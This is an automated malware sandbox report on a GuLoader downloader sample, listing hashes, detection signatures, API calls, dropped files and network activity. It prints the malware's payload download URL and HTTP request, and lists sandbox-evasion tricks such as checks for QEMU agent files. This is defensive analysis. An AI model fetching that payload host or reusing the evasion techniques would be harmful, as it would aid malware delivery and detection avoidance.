Windows Analysis Report
SecuriteInfo.com.W32.AIDetect.malware2.5627.exe

Overview

General Information

Sample Name: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
Analysis ID: 634994
MD5: 7f369d460c84146944c3c12bf83901af
SHA1: 29ea3441429d555ddfd0fd8d5973aab0f9ea2663
SHA256: a5e095edbdf743431c5e866c01c3a592fc5a7ddf6bfb617d72f81181743adf3a

Detection

GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected GuLoader
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Contains functionality to enumerate device drivers
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • cleanup
{"Payload URL": "https://hustlecreate.com/a1/binned_SsGEV34.bin"}
Source | Rule | Description | Author | Strings
00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000000.205790119879.0000000001660000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
No Sigma rule has matched
No Snort rule has matched

      AV Detection

      Source: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://hustlecreate.com/a1/binned_SsGEV34.bin"}
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Virustotal: Detection: 19%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, ReversingLabs: Detection: 12%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hardheartedly12
      Source: unknown, HTTPS traffic detected: 69.49.244.14:443 -> 192.168.11.20:49764 version: TLS 1.2
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: mshtml.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: System.Runtime.CompilerServices.VisualC.ni.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdbRSDS source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\coinstaller\Win8Release\x64\bin\vm3dc003.pdb source: vm3dc003.dll.2.dr
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Code function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Code function: 2_2_00406873 FindFirstFileW,FindClose
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Code function: 2_2_0040290B FindFirstFileW

      Networking

      Source: Malware configuration extractor, URLs: https://hustlecreate.com/a1/binned_SsGEV34.bin
      Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global traffic, HTTP traffic detected: GET /a1/binned_SsGEV34.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: hustlecreate.com | Cache-Control: no-cache
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknown, Network traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649475257.0000000001964000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://hustlecreate.com/
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://hustlecreate.com/a1/binned_SsGEV34.bin
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://hustlecreate.com/a1/binned_SsGEV34.bin42
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210649574538.0000000001978000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://hustlecreate.com/a1/binned_SsGEV34.binY
      Source: unknown, DNS traffic detected: queries for: hustlecreate.com
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Code function: 2_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D827BE4 appears 87 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D85EF10 appears 105 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D815050 appears 36 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D84E692 appears 84 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: String function: 1D7CB910 appears 266 times
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02ABBEBC NtProtectVirtualMemory,2_2_02ABBEBC
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB9DB7 NtAllocateVirtualMemory,2_2_02AB9DB7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_1D812D10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_1D812B90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_1D812B10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812DA0 NtReadVirtualMemory,4_2_1D812DA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812DC0 NtAdjustPrivilegesToken,4_2_1D812DC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812D50 NtWriteVirtualMemory,4_2_1D812D50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D813C90 NtOpenThread,4_2_1D813C90
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812CD0 NtEnumerateKey,4_2_1D812CD0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812CF0 NtDelayExecution,4_2_1D812CF0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C10 NtOpenProcess,4_2_1D812C10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C20 NtSetInformationFile,4_2_1D812C20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C30 NtMapViewOfSection,4_2_1D812C30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D813C30 NtOpenProcessToken,4_2_1D813C30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812C50 NtUnmapViewOfSection,4_2_1D812C50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812FB0 NtSetValueKey,4_2_1D812FB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812F00 NtCreateFile,4_2_1D812F00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812F30 NtOpenDirectoryObject,4_2_1D812F30
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812E80 NtCreateProcessEx,4_2_1D812E80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812EB0 NtProtectVirtualMemory,4_2_1D812EB0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812EC0 NtQuerySection,4_2_1D812EC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812ED0 NtResumeThread,4_2_1D812ED0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812E00 NtQueueApcThread,4_2_1D812E00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812E50 NtCreateSection,4_2_1D812E50
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8129D0 NtWaitForSingleObject,4_2_1D8129D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8129F0 NtReadFile,4_2_1D8129F0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8138D0 NtGetContextThread,4_2_1D8138D0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B80 NtCreateKey,4_2_1D812B80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812BC0 NtQueryInformationToken,4_2_1D812BC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812BE0 NtQueryVirtualMemory,4_2_1D812BE0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B00 NtQueryValueKey,4_2_1D812B00
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812B20 NtQueryInformationProcess,4_2_1D812B20
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812A80 NtClose,4_2_1D812A80
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812AA0 NtQueryInformationFile,4_2_1D812AA0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812AC0 NtEnumerateValueKey,4_2_1D812AC0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D812A10 NtWriteFile,4_2_1D812A10
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D814570 NtSuspendThread,4_2_1D814570
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D8134E0 NtCreateMutant,4_2_1D8134E0
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D814260 NtSetContextThread,4_2_1D814260
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_01671468 NtAllocateVirtualMemory,4_2_01671468
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess Stats: CPU usage > 98%
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drStatic PE information: No import functions for PE file found
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevm3dc003.dll> vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205923926041.000000001D56F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205930970835.000000001D720000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210674141310.000000001DA70000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: uninstalla.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Section loaded: edgegdi.dll
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeVirustotal: Detection: 19%
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeReversingLabs: Detection: 12%
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040352D
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File created: C:\Users\user\AppData\Local\Temp\nsaAD54.tmp
      Source: classification engineClassification label: mal84.troj.evad.winEXE@3/11@1/1
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_004021AA CoCreateInstance,2_2_004021AA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_0040498A
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File written: C:\Users\user\AppData\Local\Temp\Exolve.ini
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Hardheartedly12
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: mshtml.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: System.Runtime.CompilerServices.VisualC.ni.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205922259478.000000001D44C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000003.205929254527.000000001D5F3000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdb source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.VisualC\net6.0-Release\System.Runtime.CompilerServices.VisualC.pdbRSDS source: System.Runtime.CompilerServices.VisualC.dll.2.dr
      Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, 00000004.00000001.205793066847.0000000000649000.00000008.00000001.01000000.00000005.sdmp
      Source: Binary string: d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\coinstaller\Win8Release\x64\bin\vm3dc003.pdb source: vm3dc003.dll.2.dr

      Data Obfuscation

      Source: Yara matchFile source: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000000.205790119879.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C30C0 push eax; ret 2_2_713C30EE
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAAF16 push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AACCD6 pushad ; iretd 2_2_02AACCD7
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAB002 push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAB01E push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AB59DA pushad ; iretd 2_2_02AB59FA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAA52F push cs; iretd 2_2_02AAA532
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAAF73 push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAAF4E push esi; retf 2_2_02AAB000
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_02AAA158 push ebp; retn 0008h2_2_02AAA159
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7D08CD push ecx; mov dword ptr [esp], ecx4_2_1D7D08D6
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7A97A1 push es; iretd 4_2_1D7A97A8
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 4_2_1D7A21AD pushad ; retf 0004h4_2_1D7A223F
      Source: vm3dc003.dll.2.drStatic PE information: section name: .didat
      Source: vm3dc003.dll.2.drStatic PE information: section name: .gehcont
      Source: vm3dc003.dll.2.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exeCode function: 2_2_713C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_713C1BFF
      Source: SecuriteInfo.com.W32.AIDetect.malware2.5627.exeStatic PE information: real checksum: 0x0 should be: 0xe7640
      Source: System.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x3d68
      Source: uninstalla.exe.2.drStatic PE information: real checksum: 0x3f1bf6 should be: 0x4a8b4
      Source: System.Runtime.CompilerServices.VisualC.dll.2.drStatic PE information: 0xC22B5F28 [Fri Mar 24 23:05:12 2073 UTC]
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File created: C:\Users\user\AppData\Local\Temp\System.Runtime.CompilerServices.VisualC.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File created: C:\Users\user\AppData\Local\Temp\uninstalla.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File created: C:\Users\user\AppData\Local\Temp\vm3dc003.dll
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File created: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll

      Hooking and other Techniques for Hiding and Protection

      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (31).png
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe File opened: C:\Program Files\qga\qga.exe
